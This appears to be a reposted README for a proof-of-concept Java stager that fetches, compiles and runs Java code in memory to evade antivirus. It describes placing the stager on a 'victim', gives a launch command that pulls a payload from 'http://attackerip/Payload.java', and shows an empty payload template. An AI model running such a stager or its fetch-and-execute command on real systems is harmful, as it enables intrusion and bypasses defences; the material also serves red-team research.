Java-Stager - A PoC Java Stager Which Can Download, Compile, And Execute A Java File In Memory

A PoC Java Stager which can download, compile, and execute a Java file in memory.
This is for research purposes only, do not use this where you are unauthorised to do so.

What is this?
This is based on the work of James Williams from his talk "Next Gen AV vs My Shitty Code" available here:

The key parts of the talk for me are:
  • Load a Stager onto victim (touches disk, but is a benign binary)
  • Stager downloads raw code over HTTP (which stays in memory)
  • Stager compiles raw code (also in memory)
  • Stager then executes compiled code (also in memory)
His example is in .net, but in the talk he suggested that Java would be capable of the same techniques.

Working with it
  • Clone down the entire repository.
  • Open it in an IDE which can use maven (such as NetBeans)
  • The Stager, and the example payload are available in the "/src/main/java" folder.
  • Alter the Stager as you would like and compile the project. I was using "clean/build" in the default profile.
The output in NetBeans Included a line like this:
Building jar: C:\Users\cornerpirate\Documents\NetBeansProjects\java-stager\target\JavaStager-0.1-initial.jar
To work on your victim you must upload the "JavaStager*.jar" file and the "lib" folder containing Janino from the "target" folder.
The following command will execute the stager:
java -jar JavaStager-0.1-initial.jar
You will be prompted with the usage as shown:
Proper Usage is: java -jar JavaStager-0.1-initial.jar <url>
The "url" is the only parameter that is passed to Stager. An example usage would be:
java -jar JavaStager-0.1-initial.jar http://attackerip/Payload.java
Your payload must be in a file called "Payload.java" and your exploit code must be in a static method called "Run". The following shows the template if you want to write your own:
public class Payload {
public static void Run() {
// Your code here

More Information
Blog Post explaining how it all works:

Video Showing how it worked in practice:

Disqus Comments